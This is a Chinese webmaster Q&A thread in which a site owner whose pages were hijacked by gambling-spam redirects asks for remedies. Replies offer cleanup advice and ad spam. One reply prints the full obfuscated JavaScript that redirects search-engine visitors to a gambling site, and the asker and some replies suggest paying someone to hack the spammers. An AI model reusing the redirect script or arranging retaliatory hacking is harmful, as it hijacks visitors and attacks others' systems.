搜外网>搜外问答>问答页面

网站连续两次被劫持,有什么好的解决办法?顺便北京S车PK10具体是怎么个运作方式? 悬赏88元 已结束

网站前段时间被劫持了,如下图,好长时间不管,还好别人告诉我网站出问题,删除代码后,它又来了一次。

2

然后从百度搜了下“北京sai车pk10”,结果如下

3

想要资讯各位大佬的问题主要如下:

1、有什么好的办法防止它的下次攻击?(复制黏贴、灌水的就不要了)

2、百度的安全提示提交解封了,没卵用。我估计就是等着,除了等着还有更实际的解决办法没?

3、谁知道“北京S车pk10”具体是怎么个运作方式,有没有大神去黑他们的网站,最好把他们的几个站全部删除了,如有,本人友情赞助。mb没事来搞我老老实实做网站的

追加问题
    21 人参与回答
最佳回答
陈海波
陈海波 · 医疗优化,企业优化
我的微信:sec_vip 等 1 人赞同该回答

1、有什么好的办法防止它的下次攻击?(复制黏贴、灌水的就不要了)

答:1,删除木马,要找出他们的木马程序并删除;2,改密码,要修改登录的地址和登录的密码(网站和FTP或者服务器)

2、百度的安全提示提交解封了,没卵用。我估计就是等着,除了等着还有更实际的解决办法没?

答:这个急不来,只能等。这个需要你清除木马做好安全以后再去提交,然后就只能等了。

3、谁知道“北京sai车pk10”具体是怎么个运作方式,有没有大神去黑他们的网站,最好把他们的几个站全部删除了,如有,本人友情赞助。mb没事来搞我老老实实做网站的

答:具体怎么运作估计也只有内部人士才知道,如果你想搞他们的网站,可以去找大神黑了。

崔家大院
崔家大院 · 网站诊断、建站、快速排名
车水马龙的空城小白change盖浇饭站稳 等 24 人赞同该回答

劫持话最好好好你的index的头部文件一般都是哪里别人添加了一段代码,只要把那个换一下原先的那个就行了。加上CDN或者安全狗也行

枯木逢春晴晴暗狱恋世炼魔 等 23 人赞同该回答

看看自己代码里有没有什么陌生的文件夹,有的话把他删除就好了,实在不会的话就去淘宝花个十几块钱找人帮你解决一下

婚礼订制快排加我欧阳帅坏Sun吴先生 等 20 人赞同该回答

之前很早好像就看你问过了,太久了对网站影响也很大,处理不好的话可以考虑找人处理,淘宝价格也比较便宜,之前我也有过2个小时就处理好了。

奋斗小青年
奋斗小青年 · 希望用我所学的知识和经验去帮助更多的人!(正常优化+快排辅助,快排可以免费测试),交流可以加QQ:835735844
change车水马龙的空城小白站稳古剑魂梦 等 20 人赞同该回答

1、这种情况肯定是你的竞争对手在搞你,首先是上淘宝找个专业的程序帮你把网站的垃圾都清理干净;

2、如果想以后好好维护这个网站的话,那就是换服务器,不过好的服务器成本很高,群英服务器,在中国来说防御能力是很强很强的,同时价格也不便宜;如果你更换服务器的话,你的竞争对手三天两头会搞你,让你的网站没排名

3、还有你说的黑网站的技术,可以去淘宝找一找,淘宝是万能,希望能帮助你;

网站问题分析
网站问题分 · 网站建设优化 企业网站出租有需要的 网站分析意见 联系QQ微信:921987403
W婚礼订制快排加我欧阳帅坏Sun 等 20 人赞同该回答

这是藏在网站内部的一个文件,如果自己没办法找出来的话,可以考虑淘宝找人处理不是很贵,之后网站后台、账号、密码还有服务器信息修改复杂一些,网站在禁止写入就不会了。解决不了的话可以加我QQ聊下。

婚礼订制快排加我欧阳帅坏Sun哦哦哦哦 等 19 人赞同该回答

问题如果处理不了可以考虑发钱,长期这样对网站影响很大,通常把源码上木马的找到,然后把变更代码删除,服务器杀毒就好了。

小白车水马龙的空城网管站稳六耳 等 8 人赞同该回答

首先,你要观察,你的网站是属于主页劫持还是快照劫持。有针对性的排查。那个页面被改了,先把他改回来,找到马的位置,把后门删除掉。并且建议更改服务器密码。

六耳
六耳 · 大王,你请。大王,我刚才叫一个傻逼大王了,你不介意吧,嘿嘿嘿嘿……
站稳夕另安逸的忙碌人。仅呲而已╮小白 等 7 人赞同该回答

看看自己代码里有没有什么陌生的文件,有的话把他删除就好了(最好看一下日志文件),实在不会的话就去淘宝找人帮你解决一下,花不了几个钱的。

星光
星光 · 黑色或者白色,都是我喜欢的颜色
车水马龙的空城change站稳小白崔家大院 等 7 人赞同该回答

小兄弟,你这是被快找劫持了。具体快找劫持详情看百度百科

至于说防御,防个毛线,自己网站安全没做好,就不要想着防御了。如果你的网站盈利还行的话,建议请个技术提升一下你网站的安全等级。

至于说你想把这些pk的人搞死,真是想多了。干他们这个的都不差钱,你觉得你干得赢他们吗?而且这些词不是一个人做,是很多人做,干完一个还有一个。你确定你要干吗?

如果你真的有钱去干,唔,祝你好运。

北京pk10,专业的买车(类似于买*马)的关键词,这么说明白不。

闷闷不乐。我的微信:sec_vip 等 2 人赞同该回答

一旦发现网站有挂马,泛解析快照劫持,首页自动跳转等情况,检查看下网站的源代码,将非网站本身的代码去除,然后需要修复网站漏洞,不给黑客可乘之机;一般这种情况都是反复性质的被篡改跳转,清理恶意跳转代码后没过多久就又被篡改了,关于网站的漏洞修复,以及网站安全防护可以找专业的网站安全公司来处理,国内也就SINE安全,绿盟,启明星辰等安全公司比较专业,然后再修改网站相关的用户名与密码,找服务器安全公司加强服务器端的安全设置;通过申诉的方式尽可能减小网站的流量,排名损失。

我的微信:sec_vip 等 1 人赞同该回答

你好兄弟对于你这个问题我想只能给我给你解决了,我只能告诉你,你现在的网站可以被别人操控,因为你的数据库已经被镜像同步,如果你想解决这个方法,直接找我把,搜外这里的这些人没一个能给你解决的。

我的微信:sec_vip 等 1 人赞同该回答

这个问题估计是只有换代码了,或者换一下服务器。

王威健
王威健 · 考试信息网→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→
我的微信:sec_vip 等 1 人赞同该回答

这么巧,我前两天也遇到过被劫持快照的,代码如下:<script>eval(function(p,a,c,k,e,r){e=function(c){return (a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('("<5 9=\\"b\\">");("c 1=");("8((\\"a\\")>0 || (\\"o\\")>0 || (\\"d\\")>0 ||(\\"e\\")>0 ||(\\"f\\")>0 ||(\\"g\\")>0 ||(\\"h\\")>0 ||(\\"i\\")>0 )");("\\"l://\\";");("</5>");',25,25,'|s|indexOf|document|writeln|script|com|referrer|if|LANGUAGE|baidu|Javascript|var|soso|sm|uc|bing|yahoo|so|location|href|https|www|b99655|sogou'.split('|'),0,{}))</script>

[跳转代码]

判断搜索引擎跳转代码

将代码放在首页即可,直接输入网址不跳转,从搜索引擎进入会跳转到指定网站。

我删除了代码,第二天又出来了,没办法,修改了后台地址和账号密码,还是被挂马,再后来联系阿里云提交了代码,说明了情况,修改了ftp密码,这两天才没有挂马!用360网站卫士扫描了一下,发现有漏洞,dede系统,然后修补了漏洞!就这样,绝大多数情况下是同行搞的!!!

常州姜东
常州姜东 · 常州SEO姜东-专业网站建设做网站,负面信息删除,联系微信SEO-jiangd QQ:839729861
我的微信:sec_vip 等 1 人赞同该回答

上面讲的差不多了,就是找后台漏洞,删和改,修改涉及到的一切密度、投诉、申请之类的,然后使用安全狗。

我这边分享个扫码工具:  mi:o4ho  优先把ftp中涉及到内容和数据库的下载下来,然后用扫码工具进行查毒,将原来的程序重新删除后长传。

我的微信:sec_vip 等 1 人赞同该回答

给你个最简单粗暴的,我用过百试百灵。先把看得见的劫持代码删除,尽量把网站先恢复到劫持之前,然后果断删除admin目录里所有文件,备份到本地或服务器其他盘符。如果没有太多功能直接把网站所有动态文件删除,只留下HTML页面!呵呵  绝吧?

如果是DNS劫持,换DNS服务器,换第三方的!

她们说的这哪的,没有一个有我这个实际。明确告诉你,只要存在动态页面、功能板块页面就会有漏洞! 如果网站更新不是非常频繁,建议采用我这个办法!绝对好用!

加载更多
SEO培训招生中
158